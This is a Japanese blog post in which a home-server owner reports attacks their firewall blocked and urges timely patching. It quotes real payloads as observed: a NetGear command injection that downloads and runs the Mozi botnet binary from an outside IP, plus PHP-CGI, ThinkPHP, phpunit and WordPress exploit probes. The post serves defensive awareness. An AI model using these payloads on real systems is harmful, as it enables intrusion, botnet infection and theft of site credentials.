LoginSignup
304

More than 3 years have passed since last update.

Webサイトに来た攻撃をまとめてみた

Posted at

はじめに

自宅にインターネットに公開しているWebサイト(自宅サーバー)があります。Webサイトでは日夜、世界中から脆弱性を悪用しようと攻撃を受けているのですが、今回は実際にWebサイトに来た攻撃の一部を紹介してみようと思います。

環境

  • Laravel(PHP)を用いた動的なWebサイトなどを自宅で公開
  • インターネットとの境界線にFW(Fortigate)を設置。UTMライセンスあり
  • インターネット->自宅サーバーNWへの通信に対してFWのアンチウイルスIPSWAFを有効
    • IPSとは: 不正な通信を検知、ブロックする機能。主にOS、機器などの脆弱性を狙った攻撃
    • アンチウイルスとは:パケットに含まれるウイルスを検知、ブロックする機能
    • WAFとは:Webアプリケーションレベルの攻撃を検知、ブロックする機能
  • 期間は11月のある一週間

結論

自宅であろうが、AWSであろうが、レンタルサーバーであろうが、Webサイトをインターネットに公開すると攻撃を必ず受けます。Webサイトを公開する場合は、OS、ミドルウェア、アプリケーションなどの脆弱性には必ず気をつけましょう。また、公開したあともIPAなどが公開しているセキュリティ情報をチェックして、必要があればセキュリティアップデートをこまめに実施しましょう。
公開したあとアップデートもせず、Webサイト、サーバーを放置していれば、必ず脆弱性を利用した攻撃を受け脆弱性が存在すれば場合によっては内部に侵入され、システムを破壊、個人情報の流出などの被害を受けてしまうことになるでしょう

参考

脆弱性とは?その危険性と実例 – 有効な5つの対策

以下、FWが検知した攻撃

WAFが検知・ブロックした攻撃

検知したURL①


http://自宅IP/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://39.80.71.48:44394/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1

どうやらNetGear製品の脆弱性を狙う攻撃みたいです。送信元IPは中国です。

MiraiとGafgytの新たなIoT/Linuxボットネット攻撃キャンペーン

検知したURL②


https://自宅IP/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

phpunitの脆弱性の有無を確認している攻撃みたいです。送信元IPはロシアです。

CVE-2017-9841を悪用したスキャン通信の増加

検知したURL③


http://自宅IP/cgi-bin/php5?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n (http://203.135.194.15/cgi-bin/php5?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp://input+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n)

CGI版PHPの脆弱性を狙うアクセスみたいです。送信元IPは中国です。

CGI版PHPへのApache Magica攻撃の観察

IPSが検知・ブロックした攻撃

検知したURL①

ThinkPHPという中国が作ったアプリケーションフレームワークの脆弱性を悪用した攻撃みたいです。


/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21

ThinkPHP.Controller.Parameter.Remote.Code.Execution
ThinkPHPという中国のフレームワークの脆弱性が狙われて、中国の45000のサイトが攻撃を受け続けている

検知したURL②

/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php (/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php)

WordPressのディレクトリトラバーサルの脆弱性を悪用しようとする攻撃のようです。送信元IPはフランスです。

【WordPress】wp-config.phpが改ざん!Duplicatorが原因か

WordPress.HTTP.Path.Traversal

アンチウイルスが検知・ブロックした攻撃

検知下URL①


http://自宅IP/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php

wordpresの脆弱性を利用して、バックドア型トロイの木馬のファイルをアップロードしようとしている攻撃のようです。 今回はトロイの木馬ファイルを検知してアンチウイルスでブロックしているようでした。

PHP / Rst.CO!tr.bdr
WordPressのプラグインFile Managerの脆弱性を悪用した攻撃が確認。70万以上のサイトに影響か。

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
304